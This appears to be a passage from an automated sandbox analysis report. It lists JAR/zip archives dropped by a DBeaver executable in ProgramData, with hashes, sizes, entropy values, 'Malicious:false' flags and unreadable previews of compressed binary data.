      SHA-256:1C09201F78DFB7D9B303A221CFA9B097D46501A49E9CFA4E5C91E038834258AC
      SHA-512:0F55BCEAD160BCB3526EF547B05A540C24D31EBC3971175FC353B6982E6C4A5860A1BD1C149F2D84338A2A5A0DB0CAA2808869183628D9BB87FB95E6253C0D2E
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..[s.@....?Xy.J....4...FMtQ4............E$$...v..w....m!e..$..SSD....E.0.C..C//jo...a...jC..o..QN3.<vj..A...0.Y.......&~..II..j....y.4.5.%>$U.9....w..$.w!.T|..h...Q...d...#).^..DYl...6..9. .P...+.......(.....Q.......y.Iq.B.^...$>&.Z.,..,L.<.?.1a.....%..$.x......0a..S..[`.x.H..s.'L..V)~.....g.....E.b.@L.$RH2....<...R..].=.kb.U.y..K....@@x..O..N....uY.A....uv.......kx..".V..T..zp..=. ..,.E."@).9CCP.-...x..u.0.)/.?d6l$.8...vm/...Y.[}..K......s.g.w.?.`e/..m.f.5...L5}96.~.b....m..q....F.T.N....2.K.....N.ee....i?N.W....N...Nv...3.oG..X-.4......e.&f...w.9.uM=Z.[..:...=[p.b.D..'..x:w.a.....R....,[5.C].T...1.<l....W=<x..7R....PK..V...........PK..........cX................META-INF/DBEAVER.SF..K.0.....n. ..L. ..RQ|..(...-.../......L:....(.EI ....<.1"..v&...F...!..U.Kp.&...i....1..(..........`.XE,E...,.e_.tH.z.8.T...O.c{......>.i..q. 8(.HG.n..58.*.uQB.....4.l.vp.v....e/.4T.s....8br...)...........:.A..N..$.."H
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):58170
      Entropy (8bit):7.8646075503409
      Encrypted:false
      SSDEEP:
      MD5:45D46F862F2607C445204A079595BBC5
      SHA1:AF994E94EA16F4A51F0A0DABE4A07014658CACEF
      SHA-256:2845416A6323719BAF6FB5A20DE4C2C2ACBFF0B151F76C06F26A37BB1599B4C3
      SHA-512:3E826F6A30309F5B7DA54248F0433D9C43C677BA09D14698CDD4038EF8B56669622A6A64FD83626524F20FAB84FFFCA626FA0FBA9D0516FCBB073213C5F21EB3
      Malicious:false
      Reputation:unknown
      Preview:PK........0.cX................META-INF/MANIFEST.MF.X[s...~OU...k..L9..T.T..../.(....-v..../.~.f.L...Lf.yH..V.Z_..[......@BJS.....B.\...0.J..*.1psc..!.+.*5.R..-.q5)uvw...v.p..........F^.J...O.kO.).<...|..!.?9....O.a'..P*.m.3P0....DzZ..B...=.B./?.`...."..............=.)x..r.B._3p\.....(....H...m7O..B.z..........).tZv......(...2N#.....#......@.lc.....?....b...zX....HGc...iR...<p....6.....<.kO..&ym. .r@...:.HG8.....2D........Gz.......wv.R....L....#;...>.g~..E.%y..d?2.@......1.k.0.....<..m...Ks{#...T.]...v9......n...D..........y.S.^....8;..1.P....|..|w....|}...vf....E.o......9e...Qy..H.^.Tk4K<...sW....*V..>r.....j5.L!......X.,!np<}..q..RI.v..Z.(.x..c.wG+.........j<.L.u.T.#....+"..kj.Gg;J....Y..E..0.H..H.u$.J!.\......]r...)h..=5.c../....~.s...J...g.......z....H$..t..............|.X.._.i......XF.9lNmI.\....4.v..A..D.8...v..,Vg..eY.7.q(Z@_.#.|....F.[4.N5..,.xAi..]e.SV....L..S_.....f.a40.....u..N.&. ..R&.....e..(.F.....9I.^HE"TH1u...VZ..E...y."..Q.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):49029
      Entropy (8bit):7.867579675636954
      Encrypted:false
      SSDEEP:
      MD5:CE192964E03010093A3828317C967921
      SHA1:CCAAA75DE93B7CBF80F0C2084E2924A156BB0B03
      SHA-256:753D10264CED8F324E0E4A9A4AEF74B0DB3D2AACA3E2EBB57F1B9B6743546350
      SHA-512:7916C4A89BE40B5D17B576F8B0E19C342BDEAD70AD6C1A562CA1B363A31C345B9946F4A283179D8C2C9F2D43FCB67DEF94EFE2E159E513C4C55DB4B7E187EFF7
      Malicious:false
      Reputation:unknown
      Preview:PK........!.cX................META-INF/MANIFEST.MF.V]s.H.}OU..5..5S...j...@PQ....e..V[>..A._..d..I.;...y.............."..jU..J.P.UT..1t.`.Kl.Bx[..u.m..Z.{\.V....9.. ."|}%..R..Y....=V~*\.J-`.ar[...J.&.SR.'._R3@}Z..t...,.0...R#... .a.&...G.V..IO.....?)...L.$w)..W`....X..}....0...J.h....)-.E.....'@.#.8..WS.d........PLa...VI......H.CL =!.E.....FHqF\H.x.w.=....'.U...&p.hJ...!.$.....Ej.B.'&..P:...T......."..a/{R...i.@..... ..5.B..."$.w.>...1v...0.O.w.Z..Z.>}....z(....E.CX.4zB..7+....y[..>.uYA.b.M6=.....C#d.Ao..6...R..{>.h..o.yl..o.y&......(.`.s.........C."H_.R6X..qo#......]3....S..g-..c...a..n....&.....+.9N?...[...............A...~.X....rf.......q..#..iq..|Hat..L...A.6.....O..$.o...P.}L..".F...d.........n.,E...!..(...+(.3."..$.D..9..........6.M-).....%.....h....&.9.@...Kj..+.F.z..1....!...6..+RSt.f....S..d.s..t....aS..:\..j.O..j..q|.Z.q.:/...R....e.n..7,.w{.)...i.s.+...j.P..'.-.2..K7...o]/..'....Pff..,......!.k.j......T.<..,......7I.m......s..v
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):50997
      Entropy (8bit):7.876839090759959
      Encrypted:false
      SSDEEP:
      MD5:2E76F7864C57DBBAAFE8A9D53A9525B5
      SHA1:25B8E0684ABCDA31BB110D6D45176C0811A22E12
      SHA-256:001CE88F9D8364F5EF49969781673BF50FC945E94C6DFB66EC748EA67CA1ADB6
      SHA-512:F92BB56446359D9F48B3484F140EC2971E146923C0FDBF0965626E3C4FD94D796461BC7EE2CA16C407EE48B8F8BD2A2782517D43C8FF27F9CA32ABF12FB3FB93
      Malicious:false
      Reputation:unknown
      Preview:PK........2.cX................META-INF/MANIFEST.MF.WY..H.~.......VR..a....s......-.mhnw..~....l.?"...Oj!.!<..46.a..w5.I..p)......j..J.>.V0.w5...d.lQl..:ip.]...#........#...9......../../..........T..P..T.3.g.....5j.bZ[E..k...Z.......M..7..$..M|..).....AR!.OP....-1...|.........!T..d.......r3?....eq{....".x4{..L...4...&J.J......|}ex{S.l..Rd....=.&x+i& ..M.....$...G>xe...L"._.3.N/.....!o.B.y}.E......7u:c."..oU..s...!`C........?F.....fhd.6.s.......s#q.j..~.DAUf.!GV..........=.aR.#.v.f...,........'.....U..9{d.=.~........u...0l.AU.u.o...!@.j...!P.a..J..;Z.Om.d)...Y/.9..6_h.^......*..!..)..!.".D.....bh..C3V.....c.....(.(9...x.......`...v.....R....g.P.L.N...T....f.K.Y.....I...`oq..P.....^.u...L...n.k.?J.N.n.iW......s....L.....j...4.R>.SE.!.U..85.Kg.........YR}.90+...YAz?G9..}O..zCv6.tq.HV"..P.JGl....|...Z.$..1..:...........`...{...:~...|..`;.h-l3...u>Q..G..f.....u.....'../q.Q.&.1K7.i0....Qx.v......a.F.....'..v.T_..T.Nq^.)....(._..%.....LD.y.t[."..#.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):151424
      Entropy (8bit):7.902160323404326
      Encrypted:false
      SSDEEP:
      MD5:C778E190B1DC1945D65E68F9C34E73DD
      SHA1:A3D69A3D2B46F9EAF6C029E451DA4300238BAB6A
      SHA-256:4645097D705925448AD39E57D69242815315B6366A0CFDAB6C1D98812E6C9159
      SHA-512:AA139894A9D652E356A90C83048CE287E362251EA5DA4F8891F4A95F307F5E17D035889509EB8513612E27F344B02781DDAD3ADB99B4285697FE2E593C428EEB
      Malicious:false
      Reputation:unknown
      Preview:PK........2.cX................META-INF/MANIFEST.MF.ZYs.H..OU.C..oJ........&.!.b...).}..._....x.c;....@.....o.`.....W.Q......?~..(u....Rz.4..{L.2..'..........v...~rm....*>~.+.j<..q....."|[.....G'/w...'.....]T........G.U'..S.].....]....bQ.wq........'wmt.M_.QGy.z....j.G........q../.^.Y....6.](....D..L.H7@..Rk.>~..K.U....0zN...w...wW.y3......k.../~..............D^].....Q.[.'.f...k........yn..U...M...4.O....K..:..4j...V..........DuS..O3.+..g..rk....kB....vtgO.....G.E....^....S..%...~..I.M.M.w....~...'..6h...I.SQ..H...r3.......?..6....,.......\....>~....z..z.......6.n..7..Z7..T..W5.W.9..|..l./..}a.`r...Zq.._FP..0h.....u.....V6..J.H.|=..y....]....9..5..l...w..>Iv....8...r.7*..N,..u..|.hn..r.....L...\..&...=.'..yR.....m...3.....$.A....).....i.D.]..?.(.k.......h.#...N..+.4..TN...5.^.A.s.......-].M..mVs2...E@.t.../8`...~.vV......./d......2......-]....z..%.1.cs.w...V.,../W.........*....A..M o...|.C%.......k.../..$...{. ~.ve....&.."..r`...WP!....dD...M.X
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):117869
      Entropy (8bit):7.888106060044217
      Encrypted:false
      SSDEEP:
      MD5:5E1320855B2DCA69191946D176CF6517
      SHA1:DA2A08EB4F80D5C2D9F2773CBB50BE838E9DB04C
      SHA-256:84408C5A31DCEF57C3F41A4BD639324BA829C417E17411EDEEA615DC4CD5A2FA
      SHA-512:F5E2964B0F9DA2704A2D4BC27519D770873526D42AE27BF26E916066FCB915F7A14CC0DFE88DA3195A1D12FCEA70F465E4557B0B8862AA0254E99C0FF582DEFD
      Malicious:false
      Reputation:unknown
      Preview:PK........*.cX................META-INF/MANIFEST.MF.YY...~o..C.ht5#O....G-]....6...e.f1.f...\.{......t..._l.h%.......e.&.....;.."..w..j..a.....1.p.....`.!..NW.t......!H.c.`U..i...7...'._.._.. q....~......M.....Y...[...Vt...T..N..y.CZx..9(..X.._....2H..T...UQ.o`|u...O.~...."`..~1...1./.S..U.rvW0./"...[.YZT.;.9[.....z(..w^PVE..K.[...4..A.U. ...) ....?.....(.J...x(..H..........8......... P.u....|/|....P..{5......p.*-.....\...?. N]....e`.QPu.>..<^.3.z<.P.. ..'G>{....,.$YM.Y...O|2...X6z..@.AR.Ld.....w....J..s/.n.%..9....Y.\s......s.....>........G.j,u...S.|D.....w..}Q.=..>...UAu... ,."...{N..3.D.....".@Q..|.N]S.(N./.a..pGouJr.57S1x%.j.....'9K$.#+.....&....#.....P.??....i..vf.`...>2.z.!........Y...d...,.. yh..g.m.s..!pa1q..A.i..l.O.....M....._g.S.x..I.S...cf....@..+g~..qs}.&..-.=y:...&.v.F`.4..R.*:|.d...{Nb.....~d.|F...9.J5...XG..5..B.N..g=X"-5.H....l.5.A.#..?.O...%.n-..O...........[.`..`.Ne4....JF}..r....V.Xv..E`E...6....3U.wz),.I_...;?.4...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):408991
      Entropy (8bit):7.955080507973455
      Encrypted:false
      SSDEEP:
      MD5:E270623F3EB8B48C137EB978E4B1D31D
      SHA1:6F5D7A64CB33A3B5DE17D6630E0009E63BB62A53
      SHA-256:4DF2E28D345692C43B24B9C770586CCAAA6D9E378800DB67EB30F7EEBB7BC5B5
      SHA-512:01C4BC21ADE633EB6E893037C394C93D0412452C59BD4C830FC5CF51B778976230E10798320488AC052F302F3C6858020B442FEB0EF00BC31D8D173E9598FE15
      Malicious:false
      Reputation:unknown
      Preview:PK........D.cX................META-INF/MANIFEST.MF.{i.....H......9....#.Lf.`....1.0....WUwz(...Ej..x...kx..'./A..~..&..?>..._...8......C.x.C..3#.?> ..A(.....v.;u....N......_.:p....9..~....|...K. ..........tQ...U....%.,..s..C...y....-s......u...M...?]..)..._.O..a..3C.i../J........2.....I?..OL...g>?S........:...q|.......V.O/.4p..wf.....~....n.../q...........{.K..W.}.+......4..F.|.../B.=...}.f......>....~........e.|,.0../.......W...?../q.4....o...ty;+.W...~....x.N>|.Q..;.w:.K.RzZ..u(...r/z..>.I......._..;.Y..oW^'...6.g+.._?.s.... .Z.M...z.\..]...|~.......o.....n.....;.,+.Y.i..j.^.++. }E.>K.[e...L.EI..<?uZ.[..8...i..B2....#.....x.+..}vL?`...4=o...M.......f..]..........<.........gO........._~.....7..|...|,..._.<.;..~g.p...|....w..|..\...A.|..U.j........H.i....1K...Z.MV.B.AE/j.M....T].s..N(._p.../)>3."l..Y..i^g9j..U. .V.@.@.P............N.f.N~.......$........N.|vI..g5..b.y-...8;..w..=C..Wn..lt_S..ji..W....xL....6.uc&B.2.)^....q(A.8..w5..fS.E.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):30592
      Entropy (8bit):7.8150479114876745
      Encrypted:false
      SSDEEP:
      MD5:D7CE56BE07F8E38AB01BD9E025E8CD83
      SHA1:E6B3E5015B6EE1DF29BED7D4C6B2E814C2FDAF2E
      SHA-256:70812EE890846D7B8C369842C8E83F70B4E004868ADF08DA39E3C3A7358C42F0
      SHA-512:11F1E73DD03AF291A0032590ABC7D55B9899E24189493ADF9C8D55CFC5505F03CB270FC6EEADBCFB3AF8584B7387324EE7B42E13A0AC073D0D3A20E6CA3E6C61
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.VY..Z.~....V*u+).l":.y..EeQ..%u.#.l...../....q.;y..........{..........&........9.....{.-...4h....P\..i....cA.C....+.A.....d.....|........4..CTC.Qrv.........)..F.Zq.....m..~...)d~.~......@\c.b....?.hS4......0. ..A].Y............lj..P....|.b.0D....X.9.I.@...{7......2....19..?Ia....E;Ap...l.~{.c..(.p.....>...z/..>SQ#....7..6lcX...3.....wuh..Ta....[..0Z.b.x...a.L.s?.-?.qys[.$....~[:...}.~.D}n\....+>.qX..Rb';..;.?.)..<.l..!........O_...d......_....._?]_]_....,....|...x&J<..Rw..>.'%N .>...c.E.....=...z.4I9.....CSVVC+.Y..P..a%....G`......G.".^g....w...U.;>.cj7d..<..dC.y/=..."...V.P/.CIb.&q..z(...56.wE|..u"bT,.(.n..4N....[e.....?...w.}!+..n.R`........;1.;..>..@...;.....{.#;.lk=.o...f......9....30....J.q.M!l0..&...`.i.Oq0L.....Au..D.s..SC.m...N.l....F.....(. .......i..f.....e=~...mSFS...J..`..r..z%..A...Z.../.x...h&.a.xW..........%t/.N.P&.Esr..a..h...;...8-iJ...6g...E. pW.k.,I..>s..l..mE.%...f.!-..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):195380
      Entropy (8bit):7.900580721436089
      Encrypted:false
      SSDEEP:
      MD5:65850C73B87CE41F7AC0A0DF3B16874D
      SHA1:D68FFDB9E9453B84C5A13BB38369C118D678A8F7
      SHA-256:9E21C664609EE73376EF8DADA5783BE968E8E1CB57F433F1FC0BD8EAA648919F
      SHA-512:476B54C3BE7C2B7E24E0238BBB07629D1CCB072B9C60BF55C0AF14870E2DC164224882220481E93C0A56B2BBB7EC09BE0D18C860B02597B79BEF8B2AF491CA25
      Malicious:false
      Reputation:unknown
      Preview:PK........1.cX................META-INF/MANIFEST.MF.[Y..H.~o..Ci4...S....Z......j./#v.c.....gUe-.v...-.../N..;.%.L...>..M.......ot...G!.>.u..../......@...............s.<%........s./.<.(}^.ea.eh..A...aM?..aU5...^.|.Z....&.`./..S.Uy..z.j.4K.....>y..|..mR.y.....>...W.<........<t...z..X....%g...Q..fI..e.q....(.......L.e......../S.r.m..;........'M....UB?O.6|.....T7a.6a.......&|j...O|^......g...3...U....F..>u..}..O~..)..'.g...9..O..........S....^.......y..:.../..x(o>|.n...gzs8.....'o..'(.s..:If......~..?U.y.e.Tol.*.7..m._..F4.^.g.......l.......b....T...-...E............7.G^f...J.{~..f..<.f...x>.....I......_........3............?~....^........>._...]./.8...z.....n..y..&...Z.....#....I<{.?>...0.V.M'..)...l..+.r...qm.5P.B...?."..>N..._.(...'.*....]@X......`A.fw.K..a...?..........;]zm.~...H>..C,.*.].v..Z.P.&^#.)..X...>-....\.u<...gd....d...z\...M.UI...6h.l..m....*.-.....,VU.%...'zG"......X..........E.xiFx.....P....yK..9.o..v.....i....Jw.WK.L.P
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):34583
      Entropy (8bit):7.842160332509505
      Encrypted:false
      SSDEEP:
      MD5:9C2771FE59AC5F55B139113124021C79
      SHA1:F5922C9B120B9868CCC77B3727015F0AD946004C
      SHA-256:2BDBD37C690BC397CF4B2321A474C6FE237D67CCC4CED458D15957C8C8B12396
      SHA-512:20770381240E7FA9C995516AAD73D0ED9E1A100377464352F122A1CFFD5F5DDF0DDF094E6BAF5A338BDBA73EF642443F8E71C4A3E8FDBAB95AC9BB7F5DB3C7AC
      Malicious:false
      Reputation:unknown
      Preview:PK........'.cX................META-INF/MANIFEST.MF..]s.H...S..`MMm..(_j.r..(..z..@..@...6&f&..r.WT.9....n.A...........R.Z..kg.+C{W.Bh.....|.P.k4[cjL..>g....d...a\E..N.!H..n.....+..E....0.q.P..Oo.D..........R.F)..R.$..K.v.M.!.c...$..8.P.._....;A.....xL...f..K.N...?e.. ....|..^...=H.>......x...(C1.......0.U...gAJx.z....b.&O....K4C.$.V..=.....s...L.|.Y....d.../DM..<]...H......1+d)...."c;........A.L...K.....A.?<~.....!..........z...o.w.w.A.I.z..2D=.RD...[h.d..#...Z.B..P.9."!.L.CI_..C9..=].nM...:.7Zs.6.u.O.......}.....Q......j....)...h.A.....xZ..h.....!;o.WM.a"Z+....|.^........1..k.../....."JV$....MU..L:.[*{C..WO...L9.z.....Y.........x..s.<..&.o...."...{..'/dx?.3<$..K-...=..\.GA....@...p.t..J....50+.G..Y..=Of..[.l.K.KS.....h6.B....W.........]D..DF.+.]Q....n:Fa:....."=........Q.8..+..........L..<J.h>,...0..v8..R.....B...6!p:. ..Z<.P.~..'.s.*(..3}.[w.....87....~@.M..a..>.lq...*1.#....Q....3..&f9..i$/.A.y..G..k... |...5}V....r.9..*,....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):293866
      Entropy (8bit):7.903444528926145
      Encrypted:false
      SSDEEP:
      MD5:8FB205676F22A3DDA83246446E2A051D
      SHA1:E309EE80451047CAD918542E7803A24F4F1A7851
      SHA-256:6643F4AB78C8FEDD446068943F4338393FACC7281BF905463F2A28E354106ABA
      SHA-512:0CEDF36708212B019460D1A0368633F5D87592CED6020F1DBCDDF980ED33C8E6C217A0864764BF5008A701D3E15C31CF4BC5116D70AEF46FBD491374DE1570EA
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.|Y....{E..ptT....2 ..u.<0J...&!.....Q.....LlW?...5~k..N.]......:..>.......(..d..j.x....kZ...}XA......n.iu.'6...w.....Q..ox.8M..s.k3?...?.......d~^...............|K.?.~..U.....S./..1u.$...U.1.Eu..3)m.1x..Gw...(....).OS.......j...w.Z..I0?.Ob~...l^n.^.uN3?G..4s$q.....l.*..y.3...DE.|..*.X.Y3s...{#.......}xu7..y.....^.$....W.....'5...s....6.w...%Q3...*.....j.'..x...c..._7?.}^.. ....>o..q....].....<.p~.Wj..~.<&.k.y.(.8u-9....3....)9.......5/...gM5[....O.|.........~...%..{......l......Eu...I..>^.;.........6.?..o_,.]..b=.S8...!..yY..Y....?.....?]...t.J..g..........~..y."i.(.8...'.........G...."..f.....,..V.T..g..5.#4r$..e......w.......`.....|.[z.%...G.O..]BN&....1S...=WX..(.....ZD+.a.N...}...U...F...x..i........1-,l..P..T.l..PC...p....%.m)..*.>+../...>.j.f.z"fV.....x..V..z.O..0.z.m.........&..{.4..B.Q..D.i.5R.w.S..._W...Vy.M..#f..sk..T..; t2Hj...N.f7.k=..a...8Zm.ri.g.y....ul8._.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):356487
      Entropy (8bit):7.92621647211081
      Encrypted:false
      SSDEEP:
      MD5:47E2D0C623D392B4B77D1D54AEFC7DE0
      SHA1:88216BA5026C5055C54EF698CD46A5AB9E803D5B
      SHA-256:A93BA6F0B34F82E8B409F5D68E6E3E506805AE3F77AE6CA40A14EA3507470A6C
      SHA-512:86AB6FBD6E68C6CDFCED3030B02B69C4A3CF0244D725F4EBF4C13DC905D70C65133359FED7B9235FB02C8B5D348613B06D9B81D16D47E4B200DF428656BD9F49
      Malicious:false
      Reputation:unknown
      Preview:PK........'.cX................META-INF/MANIFEST.MF.|W........0.q..`.1..l.... .$........./.g......V..I...|.E..4....s.viU..w....?.!.?.A..Q..r..r.L.._.#..B.h.....?.._.........t.z}...85.A...|~...#_O..2.....P...w.j.'..._N.... .......~.[..rc..U.....j...,.._$.....|....ti..a.......{...w.}S...&>.Y.....<....fQ.Wu._O....G./.-.....?....6...e....<..p...?.C./.....jh...xj.....T/......O.4......s....;....pfH.../*...4.N..N...U.]..O>......!.r..X....}.~~./.{y...+. ....Fm.8..v~..g.?.\....J...".W3..u..'..}Q.;.U...z~..:..~9..|yh....z_^./..}...O...W....N..?.a....9../wzxi...o..}..gC,w.....Ea.X<\.r7.U.....R...~cd~....K....<U./....x."............g.....Oq.o..........?>=..8-?LE..?.a.....0i.$...^zW...)J....B........x.b.U.2.pK............&.......6..C^2.W.0...Gx.....s.%R.....fJ....$....y9N.....&'........U.o...<..^..p..2........x.F.....jM...:...Kb'..54.'.u.+..U.O..2..a...+/X.b.ru..."...f%[$.x..a<].-..-v.=m.()Y)..M.P{.o..,.r..}.d..x.....y...\yf.S..}`sf..y.:q.O.{&.G.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):1492186
      Entropy (8bit):7.935855867801488
      Encrypted:false
      SSDEEP:
      MD5:31F863194CFA21AFCB723C4193867048
      SHA1:A2432EE54A6987B4F73B20F949ABE9FA6D9A1EA3
      SHA-256:7580FD5756861BDD886AC1BF0B05FADD9ECAE1A1A55C057B10135AEDE1ED256C
      SHA-512:B5E871E815DF3A3137E71F9B1D238AFD7D5A6E480E5B7F6ADFD2905892F7D5188AD1B3F9D30A85FF9BB96C222609B284974322369CBCA0E4C0036280B2608080
      Malicious:false
      Reputation:unknown
      Preview:PK........5.cX................META-INF/MANIFEST.MF.Y..X...^f......k.Lf!..5b. .I..c... F..o.=.#2.%.PDu..+.BKk...o.[..,...w'j...../......Yy.]<...M.^/._.Y.)...... .Ba..rw..f....A.Q.GV...t..}t....P...w..7.}1....U........E.m.........-..=f}.v..._...o...)..,|..n.?.".?..2d.D....x....eURF......!...o...FV......eDe.w..W....{{...l...s..MW...2....o...?...../..../?......3...#:.Y......gFa.5].GX....P..u.....u..Q......z7.4..n.....!.......?...].>...?./..#;F..4.m.DU..<..s.u.....C/l.[....~...x..Q....'}{..\......'~w...w.+.J......,._~..>.vG.%Y..........G......u.....u..KS.....~..}...P.........K.._.m]...o..QfI.'mv.>.[..4.}....w[...DU.....#.o.z....O}......7......*^...)..\...I..Pw.{..K..Yv[..>6f..>a.]s.I/[..e..Y..;.......7...*.w....?.B.....y....o...."....N..N}.../.r..\..(.nwj...U.....qx3J.>.j.....2....m..._.h............k.-..o......V.a...........o...|#....!..J..&.....z..{...F.#.j.....?L....W.3Yr5....).7.....O.(n...2z%.\../....5.c...5...~.$..OM.]. ....v.f|e,[..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):9392
      Entropy (8bit):7.942354149107189
      Encrypted:false
      SSDEEP:
      MD5:6B81500A2560684CE485548C82F68585
      SHA1:B17588AA602152A49BBC8D74299C4887C2AB4279
      SHA-256:609A0D058642495D7BEF6EA3DDF9D4B0282F722F1136A23C9D5EA7E5BF4D29C7
      SHA-512:4403ACA4437B4CA0FC6EA3B82820EF2076705BD4B7DEA7662784B64E2AB9AE29E1F729306DAA4156AE1B5E43057353E02F398DDD20BD5839B3EDAE8AE30D4E2F
      Malicious:false
      Reputation:unknown
      Preview:PK........ .cX................META-INF/MANIFEST.MF.R.N.0..G.?..j./Q).C.9P...../e.c.?....I...B\wfggF.....:..cQ...X7.&...s.....0..f/.CB....;..z........^.a..hj.;.7.WB.]./...-..%.I.lRo..6E.>....z}$.@..%...;...!.h.Y...}..Zv2.A.......\p....3C?.^..].Y. .[.....hx..z4 .=d...T.h.....y.W)m.....a.+.J.Z...p.W=..Mp..*.Fq.7~,,.H..GGw.Qo4!.XX`.6........jo2.5.T/P...P.g/V=vnm.Z.<..E._.g17.........{OH04.N.........!.(...PK....zUt..."...PK........ .cX................META-INF/DBEAVER.SF..A..0....`.a.b.0K..,......)...mF..v....{xJhTe{-.Yj.O....1J......nD..-....&.=.b.Q.%l.....i,.+.....Ji....j.......b...mg.=\..9M.:HV?...Xb..[o...bD.d.>PK..l.].........PK........ .cX................META-INF/DBEAVER.RSA.uTU....4Hw.SX.n.. HwwH.............AZ..P$..I...G=..9.=.....{..w...k...c~..w=s.0.Dd4. ..#L..|..-.....@.l....0H.d..........!(.._.....0....x.<<.R..Fz$..{~..|wW..?.0...Cn.h..j....j*.B......!iea%a....}`.!....o.....^.2...fbo...n].B.'.........)X....,...$.p.|....\...19...?...9...:.......
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):174090
      Entropy (8bit):7.916537963802782
      Encrypted:false
      SSDEEP:
      MD5:AA3A4279F1B02B7262882947D532994D
      SHA1:784EA329D6DEA5DFF7A11F5F17C5486F200E3921
      SHA-256:30725306D98DDC6BAF1AF08C768BF0F2947BC26F1A33A339D89B46BE02DF39CC
      SHA-512:D982A2473485A46FF9FA0A96A1FFB0891B8B349B25744AF0C1EB1F481539948F10321D2DB48F86C3F8C75D8AEFAA3F194995A37A5024F4C7A995AC0490ED56D1
      Malicious:false
      Reputation:unknown
      Preview:PK........8.cX................META-INF/MANIFEST.MF.[Y..J.~o..Ck.....}..y`....f........_.qW.:..m.O].'.dF........i.5..;...,.~........./.0.bTQ0.$..g....'..Q....@_F._.....>.........6....tE.G_.._.._..Q....O...OlYW....E.?.Y.'>L.n>}.$E..0c<.e.....:y.gi.<.)I.>E./>..?MZ$y.Nr...]..(......w.m....D_.i..A_..A..^;...4.#..../;.)...^=>.E...?M.}.......I>~.c.....'..<...)(...v2..}.5eW.Q...4..O....\....j....O._oO3.<I..........vOm4....WE..0..=.........&..2b..A..z.&as.iV^...iR.?Te.~YyA.%....Jo.4-..1'...?.][.&....e.:.=....Wy~....[e.L....SPF..?.......?.^......?...............I.....`H....pi2E..O>..."IE...Yw..DQ...a~v.B0<..X......k.i...-./[...x....`....&......_W..U.....G.....|V$..s}bR..V!..e......[NQU..u.H.kB..h.'.)C..'.......G...9B........7..a5].z...yQ.E.K|.!...:....A....+..."..i...{...r.C..>(N.zy.4.X.%.....5.....!D...-a............%.....].[..R..LJy[ @.=.g)...c!......M.....E.q...]..i..Q.{A...o..X.Wi...<.\....i.......<..~....zg..{I..pt.fR.\T]+.eW}F..pw.O.Hh..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):50445
      Entropy (8bit):7.838302335497738
      Encrypted:false
      SSDEEP:
      MD5:3915818FC2CBD82B844DB6A3ACCA2D81
      SHA1:8692D38DD146200B38AD455F935405B8167366D9
      SHA-256:4D5B082149BF157BCF6B3A7B6FEDFFF32D5C49387C84643FC2D2F5F29E9FAEC5
      SHA-512:746DED01DDB50E0C11290B622F3C1E8AB277711671A0505C2618850802BC29A0E2717BDE33F24D53EDEDCEDF747C83A00E1B53BBB1F6401B860126B4B55DCE3F
      Malicious:false
      Reputation:unknown
      Preview:PK........8.cX................META-INF/MANIFEST.MF..Y......+..C.D..p..A..z`SQ......K.)...../VU......<.....<(....h[..0M..z....[..kO...g.m........~.?..].7.........s.}.....;.....q.L...../../&.$^...x.y.....b..g.o&S|.<X.(.h?....2S?.N.A.eE.....y...S..xY....0.#P40O.*..<....d....<k."`..7..(4.......h.Q.P.(.]....`_B../.^8...,..7E...hD....i.\.?.....YK........q....f.W}~1.....<.........y..E.....H.F..-.^yq.mG}...3..,.9..o..M0........u.ij.l].....O........]....^..J..iR.4..3..T...*..9.^..t..O.v. .<l".x| .K.5..^.i.a.rn4..4F539l..Ge'q......#.J.&.c...Q:.+9...q...rYo.kXU....t$,..g.T..O..f.W.._.....K.......I.o.....C.B(".\.=G:..X..p....b.3%M.&..&....%(.., ]m%{<.....G.d......I.O<..n...2..sU......r...R..E......X;....;.^.G.]..C_...l.d1.......Q..P..vj-.L....I%c..tk7...Y.p.AU K:....*..Vp.(.43.....uG.....v....j....a..J..[....mv..G~......e~*....9.-,...\.J.....F.5.|.Lz_Gt.M.]-`.>P....l.^........!.5..%_z.H.)=...u.=........../....paTeS.D.r...o.v2.f.......h..y..}..S.R(v
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):25879
      Entropy (8bit):7.788116048525369
      Encrypted:false
      SSDEEP:
